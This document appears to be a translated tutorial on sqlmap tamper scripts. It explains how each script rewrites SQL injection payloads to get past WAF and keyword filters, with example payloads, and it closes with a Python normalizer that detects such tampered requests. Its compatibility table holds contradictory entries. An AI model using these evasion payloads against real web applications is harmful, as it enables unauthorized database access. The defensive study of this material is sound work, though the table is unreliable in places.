Introduction to tamper scripts in sqlmap
I. Introduction to tamper scripts in SQLMap
1. What tamper scripts do
With the tamper scripts that ship with SQLMap, a test can to some extent get past an application's filtering of sensitive characters and the blocking rules of a WAF, and then continue with the penetration test.
Abbreviations of some protection systems:
WAF: Web Application Firewall
IPS: Intrusion Prevention System
IDS: Intrusion Detection System
2. Using tamper scripts
--tamper=TAMPER: tamper the injected data with the given script(s). Usage example:
python sqlmap.py -u ".../?uname=admin&pwd=pass123" --level=5 --risk=3 -p "uname" --tamper=xxx.py
This tests the given URL at the configured level and risk, using the selected tamper script against the parameter "uname".
II. Tamper scripts to test against different database types
When running penetration tests with SQLMap tamper scripts, the sheer number of tampers can be confusing, and at first it is not obvious which scripts to test with. Some scripts apply to SQL injection against the commonly used databases, some to a particular database type, and others to a particular version range of one database. To make the use cases of the tampers clearer, they are grouped below by type and scope:

All tamper scripts in the SQLMap directory:
tamper = apostrophemask, apostrophenullencode, appendnullbyte, base64encode, between, bluecoat, chardoubleencode, charencode, charunicodeencode, concat2concatws, equaltolike, greatest, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, percentage, randomcase, randomcomments, securesphere, space2comment, space2dash, space2hash, space2morehash, space2mssqlblank, space2mssqlhash, space2mysqlblank, space2mysqldash, space2plus, space2randomblank, sp_password, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords

Generic test tampers:
tamper = apostrophemask, apostrophenullencode, base64encode, between, chardoubleencode, charencode, charunicodeencode, equaltolike, greatest, ifnull2ifisnull, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, space2comment, space2plus, space2randomblank, unionalltounion, unmagicquotes

MSSQL (Microsoft SQL Server):
tamper = between, charencode, charunicodeencode, equaltolike, greatest, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes

MySQL:
tamper = between, bluecoat, charencode, charunicodeencode, concat2concatws, equaltolike, greatest, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, space2comment, space2hash, space2morehash, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords, xforwardedfor

Oracle:
tamper = between, charencode, equaltolike, greatest, multiplespaces, nonrecursivereplacement, randomcase, securesphere, space2comment, space2plus, space2randomblank, unionalltounion, unmagicquotes, xforwardedfor

Microsoft Access:
tamper = between, bluecoat, charencode, charunicodeencode, concat2concatws, equaltolike, greatest, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, space2comment, space2hash, space2morehash, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords

PostgreSQL:
tamper = between, charencode, charunicodeencode, equaltolike, greatest, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, space2comment, space2plus, space2randomblank, xforwardedfor
Database types and versions each tamper applies to
(*) probably applies to all versions
(-) not applicable

TAMPER                    | MySQL          | MSSQL      | Oracle | PostgreSQL
apostrophemask            | *              | *          | *      | *
apostrophenullencode      | -              | -          | -      | -
appendnullbyte            | *              | *          | *      | *
base64encode              | 4, 5, 5.5      | 2005       | 10g    | -
between                   | 5.1            | -          | -      | -
bluecoat                  | *              | *          | *      | *
apostrophemask            | 9.0.3          | 2000, 2005 | -      | 9.3
charunicodeencode         | 4, 5.0 and 5.5 | 2005       | 10g    | 8.3, 8.4, 9.0
charencode                | *              | -          | -      | -
commalessmid              | *              | -          | -      | -
concat2concatws           | *              | *          | *      | *
equaltolike               | *              | *          | *      | *
greatest                  | < 5.1          | -          | -      | -
halfversionedmorekeywords | 5.0 and 5.5    | -          | -      | -
ifnull2ifisnull           | *              | *          | *      | *
informationschemacomment  | 4, 5.0, 5.5    | 2005       | 10g    | 8.3, 8.4, 9.0
lowercase                 | 5              | -          | -      | -
modsecurityversioned      | 5              | -          | -      | -
modsecurityzeroversioned  | *              | *          | *      | *
multiplespaces            | *              | *          | *      | *
nonrecursivereplacement   | *              | *          | *      | *
overlongutf8              | 5.1.56, 5.5.11 | 2000, 2005 | N/A    | 9
percentage                | 4, 5.0, 5.5    | 2005       | 10g    | 8.3, 8.4, 9.0
randomcase                | *              | *          | *      | *
randomcomments            | *              | *          | *      | *
securesphere              | 4, 5.0, 5.5    | 2005       | 10g    | 8.3, 8.4, 9.0
space2comment             | -              | -          | -      | -
space2dash                | 4.0, 5.0       | -          | -      | -
space2hash                | >= 5.1.13      | -          | -      | -
space2morehash            | -              | 2000, 2005 | -      | -
space2mssqlblank          | *              | *          | -      | -
space2mssqlhash           | *              | *          | *      | *
space2plus                | 4, 5.0, 5.5    | 2005       | 10g    | 8.3, 8.4, 9.0
space2randomblank         | -              | *          | -      | -
sp_password               | *              | *          | *      | *
symboliclogical           | *              | *          | *      | *
unionalltounion           | *              | *          | *      | *
unmagicquotes             | 4, 5.0, 5.5    | 2005       | 10g    | 8.3, 8.4, 9.0
uppercase                 | *              | *          | *      | *
varnish                   | *              | -          | -      | -
versionedkeywords         | >= 5.1.13      | -          | -      | -
versionedmorekeywords     | *              | *          | *      | *
xforwardedfor             | *              | *          | *      | *
III. What each SQLMap tamper script does

apostrophemask.py
Function: UTF-8-encodes the apostrophe (%EF%BC%87)
Platform: All
Example: 1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

apostrophenullencode.py
Function: replaces the apostrophe with its illegal double-Unicode counterpart (%00%27)
Platform: All
Example: 1 AND '1'='1 ==> 1 AND %00%271%00%27=%00%271

appendnullbyte.py
Function: appends an encoded NULL byte (%00) to the end of the payload
Platform: Microsoft Access
Example: 1 AND 1=1 ==> 1 AND 1=1%00

base64encode.py
Function: Base64-encodes the whole payload
Platform: All
Example: 1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw==

between.py
Function: replaces the greater-than operator (>) with BETWEEN (as the second example shows, the equals sign is rewritten as well)
Platform: MSSQL 2005, MySQL 4/5.0/5.5, Oracle 10g, PostgreSQL 8.3/8.4/9.0
Examples:
1 AND A > B -- ==> 1 AND A NOT BETWEEN 0 AND B --
1 AND A = B -- ==> 1 AND A BETWEEN B AND B --

bluecoat.py
Function: replaces the spaces in the SQL statement with a valid blank character (%09) and replaces "=" with "LIKE"
Platform: MySQL 5.1, SGOS
Example: SELECT username FROM users WHERE id = 1 ==> SELECT%09username FROM%09users WHERE%09id LIKE 1

charunicodeencode.py
Function: Unicode-escape-encodes the characters of the payload (%uXXXX)
Platform: MSSQL 2000/2005, MySQL 5.1.56, PostgreSQL 9.0.3; ASP/ASP.NET
Example: SELECT FIELD%20FROM TABLE ==>
%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

charencode.py
Function: URL-encodes the payload once
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

chardoubleencode.py
Function: URL-encodes the payload twice
Platform: All
Example: SELECT FIELD FROM%20TABLE ==>
%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

commalessmid.py
Function: replaces the commas in the payload with FROM and FOR, for cases where the comma is filtered and the function takes three arguments
Platform: MySQL 5.0, 5.5
Example: MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)

concat2concatws.py
Function: CONCAT() ==> CONCAT_WS(), for cases where the CONCAT() function is filtered
Platform: MySQL 5.0
Example: CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)

equaltolike.py
Function: = ==> LIKE, for cases where the equals sign "=" is filtered
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5
Example: SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1

greatest.py
Function: > ==> GREATEST
Platform: MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: 1 AND A > B ==> 1 AND GREATEST(A, B+1)=A
If A is the larger of A and B+1, then A >= B+1, that is, A > B.

halfversionedmorekeywords.py
Function: space ==> /*!0 (prepends a versioned comment to each keyword)
Platform: MySQL 4.0.18, 5.0.22 (MySQL < 5.1)
Example: union ==> /*!0union

ifnull2ifisnull.py
Function: IFNULL(A, B) ==> IF(ISNULL(A), B, A)
Platform: MySQL 5.0 and 5.5
Example: IFNULL(1, 2) ==> IF(ISNULL(1),2,1)

informationschemacomment.py
Function:
inserts /**/ after information_schema, to get past filters that match on information_schema
retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)
Platform: All
Example: select table_name from information_schema.tables ==> select table_name from information_schema/**/.tables

lowercase.py
Function: converts the upper-case letters in the payload to lower case
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables

modsecurityversioned.py
Function: wraps the complete query in a versioned comment, to get past the open-source ModSecurity WAF
Platform: MySQL 5.0
Example: 1 AND 2>1-- ==> 1 /*!30874AND 2>1*/--

modsecurityzeroversioned.py
Function: wraps the complete query in a zero-versioned comment, to get past the WAF; similar to the one above
Platform: MySQL
Example: 1 and 2>1--+ ==> 1 /*!00000and 2>1*/--+

multiplespaces.py
Function: adds multiple spaces around SQL keywords
Platform: All
Example: 1 UNION SELECT foobar ==> 1    UNION     SELECT   foobar

nonrecursivereplacement.py
Function: doubles up keywords, for use against keyword filters
Platform: All
Example: 1 UNION SELECT 2-- ==> 1 UNIONUNION SELESELECTCT 2--

overlongutf8.py
Function: converts the characters of the given payload to overlong UTF-8 encodings
Platform: All
Example: SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1

percentage.py
Function: puts a percent sign (%) in front of every letter of each keyword, to get past keyword filters
Platform: MSSQL 2000, 2005, MySQL 5.1.56, 5.5.11, PostgreSQL 9.0
Example: SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

randomcase.py
Function: randomizes the case of the payload
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: INSERT ==> InseRt

randomcomments.py
Function: randomly inserts /**/ comments inside the keywords of the payload; can be used against keyword filters
Platform: MySQL
Example: INSERT ==> I/**/N/**/SERT

securesphere.py
Function: appends a specially crafted string to the payload
Platform: All
Example: 1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having'

space2comment.py
Function: replaces spaces with the comment /**/, to get past space filtering
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: SELECT id FROM users ==> SELECT/**/id/**/FROM/**/users

space2dash.py
Function: replaces each space with [a dash comment (--) + a random string + a newline]
Platform: MSSQL, SQLite
Example: union select 1,2--+ ==> union--HSHjsJh%0Aselect--HhjHSJ%0A1,2--+

space2hash.py
Function: replaces each space with [a pound-sign comment (#) + a random string + a newline]
Platform: MySQL
Example: union select 1,2--+ ==> union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2--+

space2morehash.py
Function: replaces each space with several [pound-sign comment (#) + random string + newline] sequences
Platform: MySQL >= 5.1.13
Example: union select 1,2--+ ==> union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2--+

space2mssqlblank.py
Function: replaces the spaces in the payload with a random blank character taken from:
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
Platform: MSSQL 2000, 2005
Example: SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users

space2mssqlhash.py
Function: replaces the spaces in the payload with [the character # + a newline]
Platform: MSSQL, MySQL
Example: union select 1,2--+ ==> union%23%0Aselect%23%0A1,2--+

space2plus.py
Function: replaces spaces with plus signs (+)
Platform: All
Example: SELECT id FROM users ==> SELECT+id+FROM+users

space2randomblank.py
Function: replaces the spaces in the payload with random blank characters
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers

sp_password.py
Function: appends sp_password to the end of the payload to obfuscate the database logs (space ==> sp_password)
Platform: MSSQL
Example: 1 AND 9227=9227-- ==> 1 AND 9227=9227-- sp_password

symboliclogical.py
Function: replaces AND with && and OR with ||, for cases where those keywords are filtered
Platform: All
Examples:
1 and 1=1 ==> 1 %26%26 1=1
1 or 1=1 ==> 1 %7c%7c 1=1

unionalltounion.py
Function: replaces UNION ALL SELECT with UNION SELECT
Platform: All
Example: union all select 1,2--+ ==> union select 1,2--+

unmagicquotes.py
Function: uses a wide (multibyte) character to get past GPC addslashes
Platform: All
Example: 1' and 1=1 ==> 1%df%27 and 1=1--

uppercase.py
Function: converts the lower-case letters in the payload to upper case
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: insert ==> INSERT

varnish.py
Function: adds an HTTP header "X-originating-IP" to get past the WAF
Platform: All
Example (the body of the script):
def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    headers["X-originating-IP"] = "127.0.0.1"
    return payload

versionedkeywords.py
Function: wraps the non-function keywords in versioned comments
Platform: MySQL 4.0.18, 5.1.56, 5.5.11
Example: 1 union select user() ==> 1/*!UNION*//*!SELECT*/user()

versionedmorekeywords.py
Function: wraps every keyword in a versioned comment
Platform: MySQL 5.1.56, 5.5.11
Example: 1 union select user() ==> 1/*!UNION*//*!SELECT*/user()

xforwardedfor.py
Function: adds a forged HTTP header "X-Forwarded-For" to get past the WAF
Platform: All
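The tampers above mostly succeed against filters that inspect the raw parameter value. As an added defender-side example, not part of the original page, the Python below canonicalizes a parameter (repeated URL decoding, %u decoding, fullwidth-to-ASCII folding, NULL removal, versioned and inline comment stripping, comment-plus-newline and blank-character collapsing, case folding) before any signature is applied; the function names normalize and detect, the SIGNATURES list and the SAMPLES inputs are all assumptions, and the samples are constructed from the page's own tamper examples.

```python
import re
import unicodedata
from urllib.parse import unquote_plus

# Signatures run against the normalized value, never the raw parameter. union_select has no \b
# anchors on purpose: nonrecursivereplacement yields "unionunion seleselectct", still a substring match.
SIGNATURES = {
    "union_select": re.compile(r"union.*select"),
    "sleep_call": re.compile(r"\bsleep\s*\("),
    "info_schema": re.compile(r"information_schema\s*\."),
    "tautology": re.compile(r"(?:\b(?:and|or)\b|&&|\|\|)\s+\S+\s*(?:not\s+)?"
                            r"(?:=|like|between|>|<)\s*\S+"),
    "sp_password": re.compile(r"\bsp_password\b"),
    "securesphere_tail": re.compile(r"'0having'\s*=\s*'0having'"),
}

def normalize(value: str) -> str:
    """Undo the encodings and comment tricks listed above so one canonical form can be
    matched. base64encode is not undone: only the application knows which fields it decodes."""
    s = value
    for _ in range(3):                        # chardoubleencode: decode until stable
        prev = s
        s = re.sub(r"%u([0-9A-Fa-f]{4})",     # charunicodeencode: %u0053 -> S
                   lambda m: chr(int(m.group(1), 16)), s)
        s = unquote_plus(s)                   # charencode, space2plus; unmagicquotes %df%27 -> \ufffd'
        if s == prev:
            break
    s = re.sub(r"%([A-Za-z])(?![0-9A-Fa-f])", r"\1", s)  # percentage: %S%E%L -> SEL
    s = unicodedata.normalize("NFKC", s)      # apostrophemask: U+FF07 -> '
    s = s.replace("\x00", "")                 # appendnullbyte, apostrophenullencode
    s = re.sub(r"/\*!\d*", " ", s)            # /*!30874AND -> AND, /*!0union -> union
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # space2comment, randomcomments, informationschemacomment
    s = s.replace("*/", " ")                  # closing half of an unwrapped /*!... */
    s = re.sub(r"(?:#|--)[^\n]*\n", " ", s)   # space2hash, space2dash, space2morehash
    s = re.sub(r"[\x01-\x20]+", " ", s)       # space2mssqlblank, space2randomblank, multiplespaces
    return s.strip().lower()                  # randomcase, uppercase, lowercase

def detect(raw: str) -> list:
    """Names of the signatures that fire on the normalized form of raw."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(normalize(raw)))

# Constructed inputs: the page's own tamper examples, as they would arrive in a query string.
SAMPLES = {
    "apostrophemask": "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871",
    "modsecurityversioned": "1 /*!30874AND 2>1*/--",
    "space2morehash": "union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2--+",
    "nonrecursivereplacement": "1 UNIONUNION SELESELECTCT 2--",
    "unmagicquotes": "1%df%27 and 1=1--",
    "securesphere": "1 AND 1=1 and '0having'='0having'",
}
```

The lossy steps (percent stripping, comment removal) are acceptable for a detection pipeline because the goal is matching, not reproducing the query; the same normalization applied to web-server logs lets the tampered requests be found after the fact.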
